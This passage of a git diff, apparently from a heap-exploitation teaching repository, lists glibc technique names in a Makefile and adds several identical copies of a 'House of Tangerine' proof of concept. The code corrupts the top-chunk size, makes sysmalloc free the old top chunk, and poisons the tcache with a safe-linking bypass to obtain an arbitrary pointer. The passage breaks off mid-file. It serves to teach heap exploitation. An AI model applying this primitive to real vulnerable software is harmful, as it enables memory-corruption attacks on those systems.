overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free house_of_tangerine +V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free house_of_tangerine +V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) diff --git a/glibc_2.32/house_of_tangerine.c b/glibc_2.32/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.32/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.33/house_of_tangerine.c b/glibc_2.33/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.33/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.35/house_of_tangerine.c b/glibc_2.35/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.35/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.36/house_of_tangerine.c b/glibc_2.36/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.36/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 